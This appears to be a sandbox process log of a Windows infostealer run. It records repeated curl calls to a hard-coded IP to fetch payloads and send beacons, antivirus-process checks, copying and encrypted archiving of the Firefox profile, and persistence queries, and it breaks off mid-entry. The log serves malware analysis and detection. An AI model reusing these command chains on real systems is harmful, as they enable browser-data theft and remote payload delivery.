C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nbpfi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"5⤵
- System Location Discovery: System Language Discovery
PID:4128 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\nbpfi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"6⤵PID:3184
-
-
-
C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe"C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
PID:4872 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd6⤵PID:512
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:968
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"7⤵PID:2980
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4204
-
-
C:\Windows\SysWOW64\findstr.exefindstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"7⤵
- System Location Discovery: System Language Discovery
PID:3624
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3034827⤵
- System Location Discovery: System Language Discovery
PID:2264
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "OVERTOOLBARALOTNHL" Weeks7⤵PID:1180
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Norman + ..\Eight + ..\Considerations + ..\Bailey + ..\Parts + ..\Showcase + ..\Samples + ..\Shepherd + ..\Subsection f7⤵PID:920
-
-
C:\Users\Admin\AppData\Local\Temp\303482\Either.pifEither.pif f7⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2412 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kyngx" "178.215.224.252/v10/ukyh.php?jspo=6"8⤵
- System Location Discovery: System Language Discovery
PID:5048 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\kyngx" "178.215.224.252/v10/ukyh.php?jspo=6"9⤵PID:4628
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xgcrd" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵
- System Location Discovery: System Language Discovery
PID:3556 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\xgcrd" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bwzkv" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵PID:3432
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\bwzkv" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:648
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tapmx" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D"8⤵
- System Location Discovery: System Language Discovery
PID:940 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\tapmx" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D"9⤵PID:4040
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\DolphinDumps" & azvw.exe -o qyup.zip8⤵PID:4456
-
C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exeazvw.exe -o qyup.zip9⤵
- Executes dropped EXE
PID:3864
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lnntu" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵PID:4964
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\lnntu" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:4904
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rxhjz" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵PID:4100
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\rxhjz" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:3232
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pcmfo" "178.215.224.74/v10/ukyh.php?jspo=8"8⤵PID:4976
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\pcmfo" "178.215.224.74/v10/ukyh.php?jspo=8"9⤵PID:4700
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\smoqi" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵PID:4704
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\smoqi" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:2796
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fbjwi" "178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=3A78C5703B2D9750556C36A3F42A4C"8⤵
- System Location Discovery: System Language Discovery
PID:1604 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\fbjwi" "178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=3A78C5703B2D9750556C36A3F42A4C"9⤵PID:2756
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wziuy" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵PID:4776
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\wziuy" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:2292
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xbwcs" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵
- System Location Discovery: System Language Discovery
PID:4952 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\xbwcs" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:996
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh2648⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2372 -
C:\Windows\SysWOW64\Robocopy.exerobocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh2649⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vlkbr" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵PID:3780
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\vlkbr" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:1460
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe a "C:\Users\Admin\AppData\Roaming\DolphinDumps\3A78C5703B2D9750556C36A3F42A4C_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"8⤵
- System Location Discovery: System Language Discovery
PID:4204 -
C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exeC:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe a "C:\Users\Admin\AppData\Roaming\DolphinDumps\3A78C5703B2D9750556C36A3F42A4C_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ixmow" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵PID:3436
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\ixmow" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:4252
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tfrew" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵
- System Location Discovery: System Language Discovery
PID:2840 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\tfrew" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:1976
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hjnsq" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=9367d48999a86f6e28935bc65a369c9f*6&jwvs=3A78C5703B2D9750556C36A3F42A4C"8⤵
- System Location Discovery: System Language Discovery
PID:3556 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\hjnsq" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=9367d48999a86f6e28935bc65a369c9f*6&jwvs=3A78C5703B2D9750556C36A3F42A4C"9⤵PID:3328
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C rd /s /q "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"8⤵PID:3432
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vwmok" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵PID:4820
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\vwmok" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:1316
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sgckt" "178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=3A78C5703B2D9750556C36A3F42A4C&bsxa=1"8⤵PID:3956
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\sgckt" "178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=3A78C5703B2D9750556C36A3F42A4C&bsxa=1"9⤵PID:3336
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ejbkr" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵PID:736
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\ejbkr" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:3948
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\stqti" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵PID:3392
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\stqti" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qoaen" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=7a0e7ff378475ac947884c10019889bc*2&jwvs=3A78C5703B2D9750556C36A3F42A4C"8⤵
- System Location Discovery: System Language Discovery
PID:4060 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\qoaen" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=7a0e7ff378475ac947884c10019889bc*2&jwvs=3A78C5703B2D9750556C36A3F42A4C"9⤵PID:936
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tywfn" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵PID:3972
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\tywfn" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:1320
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\glxna" "178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=3A78C5703B2D9750556C36A3F42A4C"8⤵PID:1344
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\glxna" "178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=3A78C5703B2D9750556C36A3F42A4C"9⤵PID:1584
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ibyeu" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵
- System Location Discovery: System Language Discovery
PID:3804 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\ibyeu" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:4900
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 57⤵PID:4984
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fujps" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵
- System Location Discovery: System Language Discovery
PID:2624 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\fujps" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:3956
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dqxiv" "178.215.224.74/v10/ukyh.php?gi"5⤵PID:4268
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\dqxiv" "178.215.224.74/v10/ukyh.php?gi"6⤵PID:1420
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\yisgz" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵PID:3476
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\yisgz" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:3516
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kpsan" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵PID:3720
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\kpsan" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:3980
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sfqfo" "178.215.224.74/v10/ukyh.php?jspo=33&jwvs=3A78C5703B2D9750556C36A3F42A4C"5⤵
- System Location Discovery: System Language Discovery
PID:4052 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\sfqfo" "178.215.224.74/v10/ukyh.php?jspo=33&jwvs=3A78C5703B2D9750556C36A3F42A4C"6⤵PID:2324
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bdips" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵PID:1728
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\bdips" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:2264
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ulwhl" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"5⤵PID:4372
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\ulwhl" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"6⤵PID:3844
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps5⤵PID:5032
-
C:\Windows\SysWOW64\reg.exeREG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps6⤵PID:4964
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript5⤵PID:992
-
C:\Windows\SysWOW64\reg.exereg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript6⤵PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps5⤵PID:4904
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /QUERY /TN MyTasks\DolphinDumps6⤵PID:2564
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wltty" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵
- System Location Discovery: System Language Discovery
PID:2812 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\wltty" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:3464
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cuevq" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"5⤵PID:4312
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\cuevq" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"6⤵PID:4320
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\iosjd" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵PID:2972
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\iosjd" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:3612
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nqwgb" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵
- System Location Discovery: System Language Discovery
PID:2848 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\nqwgb" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tfrqd" "178.215.224.74/v10/ukyh.php?gi"5⤵
- System Location Discovery: System Language Discovery
PID:4292 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\tfrqd" "178.215.224.74/v10/ukyh.php?gi"6⤵PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ikvhz" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵
- System Location Discovery: System Language Discovery
PID:3632 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\ikvhz" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tbgpi" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵
- System Location Discovery: System Language Discovery
PID:4844 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\tbgpi" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:3900
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vnufs" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"5⤵PID:2040
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\vnufs" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"6⤵PID:4372
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps5⤵
- System Location Discovery: System Language Discovery
PID:1612 -
C:\Windows\SysWOW64\reg.exeREG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps6⤵PID:4652
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript5⤵
- System Location Discovery: System Language Discovery
PID:3184 -
C:\Windows\SysWOW64\reg.exereg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript6⤵
- System Location Discovery: System Language Discovery
PID:3864
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps5⤵PID:5044
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /QUERY /TN MyTasks\DolphinDumps6⤵
- System Location Discovery: System Language Discovery
PID:4676
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gqaqc" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵PID:3080
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\gqaqc" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:5108
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\soksi" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"5⤵
- System Location Discovery: System Language Discovery
PID:1420 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\soksi" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"6⤵PID:3036
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps5⤵
- System Location Discovery: System Language Discovery
PID:2564 -
C:\Windows\SysWOW64\reg.exeREG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps6⤵PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript5⤵
- System Location Discovery: System Language Discovery
PID:3768 -
C:\Windows\SysWOW64\reg.exereg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript6⤵
- System Location Discovery: System Language Discovery
PID:3688
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps5⤵PID:1688
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /QUERY /TN MyTasks\DolphinDumps6⤵
- System Location Discovery: System Language Discovery
PID:1244
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dcnxf" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵PID:1924
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\dcnxf" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:3700
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vghme" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"5⤵
- System Location Discovery: System Language Discovery
PID:1424 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\vghme" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"6⤵PID:1320
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps5⤵PID:2088
-
C:\Windows\SysWOW64\reg.exeREG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps6⤵
- System Location Discovery: System Language Discovery
PID:3296
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript5⤵PID:2536
-
C:\Windows\SysWOW64\reg.exereg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript6⤵PID:2768
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps5⤵
- System Location Discovery: System Language Discovery
PID:436 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /QUERY /TN MyTasks\DolphinDumps6⤵
- System Location Discovery: System Language Discovery
PID:4476
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zimxc" "178.215.224.74/v10/ukyh.php?jspo=6"5⤵PID:2700
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\zimxc" "178.215.224.74/v10/ukyh.php?jspo=6"6⤵PID:544
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\insay" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"5⤵
- System Location Discovery: System Language Discovery
PID:3692 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\insay" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"6⤵PID:1092
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps5⤵
- System Location Discovery: System Language Discovery
PID:2384 -
